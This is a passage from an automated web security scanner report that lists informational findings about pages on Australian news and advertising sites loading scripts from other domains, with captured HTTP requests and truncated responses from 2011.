http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=b7b37ac8-c4ca-4367-bbe2-2919639c993e&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOgDAMQ6.CMlOJxm0.3IZWbIiNCXF3ksnvSbZfAmhf3FiwLgQOMaBaWg2hoQN6TCuzzaM0iJYxTi7s1QU.3XFSTrOsnTdNyx.P7JFtgwW2wPu5rkAJrFHt8v3wRhtJ%26redirectURL%3D

Request

Response

15.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://uac.advertising.com/wrapper/aceUAC.js

Request

Response

15.26. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-%26redirectURL%3D

Request

GET /a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/ HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

15.27. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=78d7f6f8-4a94-49f1-bd08-568086a90b2d&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDEOwzAMA78SaK4ByZJlqb9JYHgKsmUq.vfQmXgHkPyRKn23jOr62UgrJFQlDCYQ6jH69BnF9rRiOaUcg6M0Dw7fk486aE3fcqvcl62fRDaksQbQgNd9nkAHCqpN_g_SKxrx%26redirectURL%3D

Request

Response

15.28. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=517297b7-81f8-4c9d-83e0-6fc052f666fd&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDkOxDAMA78SqI4BS7IO5zk5XAXpUgX796UrzgAkP1KlbekprutCKpBU5WwwhpBxSI89SvLI0o5.ltSrFh9HNRnuPk6a01kOkxrT5k9HGrJVTWADPu99Ax3IqBr__sizGvE-%26redirectURL%3D

Request

GET /a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^3; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568

Response

15.29. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=38ff2596-849f-413c-a1a5-af80ea37249b&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4By5Rsqb9xi3oKumUK.vfSE.8AkrcA8jwyWsfjEDRKABpGU4og1mqevYTlKqZ4l6nTy1xRPxOjWb5kT3d5eKtj2_5JpjOtIohG_F7nSexEZdX19wfXYBsR%26redirectURL%3D

Request

Response

15.30. http://resources.news.com.au/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.news.com.au
Path:	/cs/library/modules/jquery-socialise/plugins/linkedin/iframe.html

Issue detail

The response dynamically includes the following script from another domain:

http://platform.linkedin.com/in.js

Request

Response

15.31. http://resources.smh.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.smh.com.au
Path:	/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

Issue detail

The response dynamically includes the following script from another domain:

http://cf.kampyle.com/k_button.js

Request

GET /common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js HTTP/1.1
Host: resources.smh.com.au
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Sep 2011 00:51:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, proxy-revalidate, max-age=1250
Expires: Wed, 07 Sep 2011 14:35:35 GMT
Date: Wed, 07 Sep 2011 14:14:45 GMT
Content-Length: 78420
Connection: close

var dbits;var canary=244837814094590;var j_lm=((canary&16777215)==15715070);function BigInteger(e,d,f){if(e!=null){if("number"==typeof e){this.fromNumber(e,d,f)
}else{if(d==null&&"string"!=typeof e){t
...[SNIP]...
",{href:j,target:"kampyleWindow",id:"kampylink"});n.addClass("k_static");n.append(h);n.click(function(o){FD.stopEvent(o);
k_button.open_ff("site_code="+g+"&lang=en&form_id="+k)});e.append(n);e.append('<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"><\/script>
...[SNIP]...

15.32. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars.homepage_min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.watoday.com.au
Path:	/common/media-common-1.0/js/fdjsf/output/fd.registrars.homepage_min.js

Issue detail

The response dynamically includes the following script from another domain:

http://cf.kampyle.com/k_button.js

Request

GET /common/media-common-1.0/js/fdjsf/output/fd.registrars.homepage_min.js HTTP/1.1
Host: resources.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Sep 2011 00:51:06 GMT
Accept-Ranges: bytes
Content-Length: 233577
Cache-Control: public, proxy-revalidate, max-age=3600
Expires: Wed, 07 Sep 2011 15:14:10 GMT
Date: Wed, 07 Sep 2011 14:14:10 GMT
Connection: close
Vary: Accept-Encoding

/*
* jQuery UI 1.8.13
*
* Copyright 2011, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.com
...[SNIP]...
",{href:j,target:"kampyleWindow",id:"kampylink"});n.addClass("k_static");n.append(h);n.click(function(o){FD.stopEvent(o);
k_button.open_ff("site_code="+g+"&lang=en&form_id="+k)});e.append(n);e.append('<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"><\/script>
...[SNIP]...

15.33. http://resources.watoday.com.au/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.watoday.com.au
Path:	/common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js

Issue detail

The response dynamically includes the following script from another domain:

http://cf.kampyle.com/k_button.js

Request

GET /common/media-common-1.0/js/fdjsf/output/fd.registrars_min.js HTTP/1.1
Host: resources.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422870964; k_visit=1; __utma=209218509.1580993531.1315422892.1315422892.1315422892.1; __utmb=209218509.1.10.1315422892; __utmc=209218509; __utmz=209218509.1315422892.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript
Last-Modified: Fri, 02 Sep 2011 00:51:08 GMT
Accept-Ranges: bytes
Content-Length: 78420
Cache-Control: public, proxy-revalidate, max-age=3350
Expires: Wed, 07 Sep 2011 15:14:33 GMT
Date: Wed, 07 Sep 2011 14:18:43 GMT
Connection: close
Vary: Accept-Encoding

var dbits;var canary=244837814094590;var j_lm=((canary&16777215)==15715070);function BigInteger(e,d,f){if(e!=null){if("number"==typeof e){this.fromNumber(e,d,f)
}else{if(d==null&&"string"!=typeof e){t
...[SNIP]...
",{href:j,target:"kampyleWindow",id:"kampylink"});n.addClass("k_static");n.append(h);n.click(function(o){FD.stopEvent(o);
k_button.open_ff("site_code="+g+"&lang=en&form_id="+k)});e.append(n);e.append('<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"><\/script>
...[SNIP]...

15.34. http://weather.news.com.au/wa/perth/perth previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/wa/perth/perth

Issue detail

The response dynamically includes the following scripts from other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://data.weatherzone.com.au/javascript/jquery/jquery.cookies.2.2.0.min.js
http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js

Request

GET /wa/perth/perth HTTP/1.1
Host: weather.news.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.31
Vary: Accept-Encoding
Content-Length: 72601
Content-Type: text/html
Cache-Control: max-age=30
Expires: Wed, 07 Sep 2011 14:14:57 GMT
Date: Wed, 07 Sep 2011 14:14:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>

       <!--
           NEWS4
           Masthead:
...[SNIP]...
<link rel="icon" href="http://resources.news.com.au/cs/newscomau/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/jquery/jquery.cookies.2.2.0.min.js"></script>

       <script type="text/javascript" src="http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js"></script>
...[SNIP]...

15.35. http://weather.news.com.au/widgets/local/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/local/

Issue detail

The response dynamically includes the following script from another domain:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js

Request

Response

15.36. http://weather.news.com.au/widgets/monthly-almanac/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/monthly-almanac/

Issue detail

The response dynamically includes the following script from another domain:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js

Request

Response

15.37. http://weather.news.com.au/widgets/radar/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/radar/

Issue detail

The response dynamically includes the following scripts from other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js

Request

Response

15.38. http://weather.news.com.au/widgets/satellite/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://weather.news.com.au
Path:	/widgets/satellite/

Issue detail

The response dynamically includes the following scripts from other domains:

http://data.weatherzone.com.au/javascript/jquery/jquery-1.latest.min.js
http://data.weatherzone.com.au/javascript/twc/animator-1.latest.min.js

Request

Response

15.39. http://web.adblade.com/imps.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.adblade.com
Path:	/imps.php

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D; __tuid=3269600676904920279; __qca=P0-1392796123-1315103186293

Response

15.40. http://www.6pr.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6pr.com.au
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js
http://secure-au.imrworldwide.com/v53.js
http://widgets.twimg.com/j/2/widget.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:39 GMT
Server: Apache
Set-Cookie: JSESSIONID=025261CC856216054C9D51780EE917A3; Path=/
Age: 0
Last-Modified: Wed, 07 Sep 2011 14:14:39 GMT
Pragma: no-cache
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-AU
Content-Length: 90609
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>6PR - Homepage<
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js"></script>
...[SNIP]...

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js"></script>
...[SNIP]...

15.41. http://www.6pr.com.au/blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6pr.com.au
Path:	/blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/cookies.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js
http://secure-au.imrworldwide.com/v53.js

Request

GET /blogs/6pr-perth-blog/claws-out-for-cat-laws/20110907-1jwus.html HTTP/1.1
Host: www.6pr.com.au
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:59 GMT
Server: Apache
Age: 0
Last-Modified: Wed, 07 Sep 2011 14:19:59 GMT
Pragma: no-cache
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-AU
Content-Length: 65137
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Claws out f
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js"></script>
...[SNIP]...
</form>

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/cookies.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js"></script>
...[SNIP]...

15.42. http://www.6pr.com.au/not_found.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6pr.com.au
Path:	/not_found.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js
http://secure-au.imrworldwide.com/v53.js

Request

GET /not_found.html HTTP/1.1
Host: www.6pr.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:19 GMT
Server: Apache
Age: 0
Pragma: no-cache
Connection: close
Content-Length: 45054
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>404 Not F
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js"></script>
...[SNIP]...

15.43. http://www.6pr.com.au/trolls-attack-shark-victim/20110907-1jxqv.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.6pr.com.au
Path:	/trolls-attack-shark-victim/20110907-1jxqv.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js
http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js
http://secure-au.imrworldwide.com/v53.js

Request

GET /trolls-attack-shark-victim/20110907-1jxqv.html HTTP/1.1
Host: www.6pr.com.au
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:05 GMT
Server: Apache
Age: 0
Last-Modified: Wed, 07 Sep 2011 14:20:05 GMT
Pragma: no-cache
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-AU
Content-Length: 51558
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Trolls attac
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mt.mytalknetwork.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/fd.mytalknetwork.custom.js"></script>
<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/mytalk.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://resources.6pr.f2.com.au/myTalkNetwork/core/2008-04/js/s_code.js"></script>
...[SNIP]...

15.44. http://www.7perth.com.au/view/2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/view/2/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/scriptaculous.js
http://c3.springcms.com.au/js/system.externallinks.js
http://www.google-analytics.com/ga.js

Request

GET /view/2/ HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Wed, 07 Sep 2011 14:18:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 16207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="/css/spring.print.css" />
